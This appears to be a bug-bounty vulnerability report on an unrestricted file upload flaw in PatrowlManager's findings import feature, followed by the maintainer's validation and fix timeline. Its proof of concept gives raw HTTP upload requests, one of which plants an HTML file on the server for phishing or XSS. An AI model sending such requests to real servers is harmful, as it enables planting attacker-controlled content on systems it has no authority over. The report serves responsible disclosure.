Unrestricted Upload of File with Dangerous Type in patrowl/patrowlmanager

Valid

Reported on

Dec 11th 2021


Description

Hi there, I would like to report a vulnerability in the way PatrowlManager handle upload files. This is in Finding -> Import feature

Proof of Concept

  1. Install PatrowlManager on you local system
  2. Go to Finding -> Import and import a file
  3. An import request look like this
POST /findings/import HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------29659837897421318982168117420
Content-Length: 886
Origin: http://localhost:8083
Connection: close
Referer: http://localhost:8083/findings/import
Cookie: patrowl-manager-sc=d7q0a2r8b3b3ytmslj252gxt2l3epdmn
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="csrfmiddlewaretoken"

nMMKSdScbbCYF7NK7YyzuaW9diH5PhI24HBlLGDuAGf1VI5RhmDQdnrpiGyaZaG2
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="engine"

html
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="min_level"

info
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="file"; filename="file.json"
Content-Type: text/html

file-content
-----------------------------29659837897421318982168117420--

If you change "engine" in the above request to some other extensions like .html, .py, you can upload any type of file you want. One example of uploading html file for fishing and XSS is

POST /findings/import HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------29659837897421318982168117420
Content-Length: 875
Origin: http://localhost:8083
Connection: close
Referer: http://localhost:8083/findings/import
Cookie: patrowl-manager-sc=d7q0a2r8b3b3ytmslj252gxt2l3epdmn
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="csrfmiddlewaretoken"

nMMKSdScbbCYF7NK7YyzuaW9diH5PhI24HBlLGDuAGf1VI5RhmDQdnrpiGyaZaG2
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="engine"

html
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="min_level"

info
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="file"; filename="patrowl.html"
Content-Type: text/html

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Here</title>
</head>
<body>
    <a href="https://example.com">Click here</a>

</body>
</html>
-----------------------------29659837897421318982168117420--

  1. Go to folder /media/imports/<owner_id>/ and see that the dangerous html file is uploaded.

Impact

This vulnerability is capable of uploading dangerous type of file to server.

We are processing your report and will contact the patrowl/patrowlmanager team within 24 hours. 9 months ago
We have contacted a member of the patrowl/patrowlmanager team and are waiting to hear back 9 months ago
patrowl/patrowlmanager maintainer validated this vulnerability 9 months ago
M0rphling has been awarded the disclosure bounty
The fix bounty is now up for grabs
patrowl/patrowlmanager maintainer
9 months ago

Maintainer


Hi @M0rphling, thanks for your report ! Will fix it ASAP

patrowl/patrowlmanager maintainer confirmed that a fix has been merged on ba276f 9 months ago
The fix bounty has been dropped
to join this conversation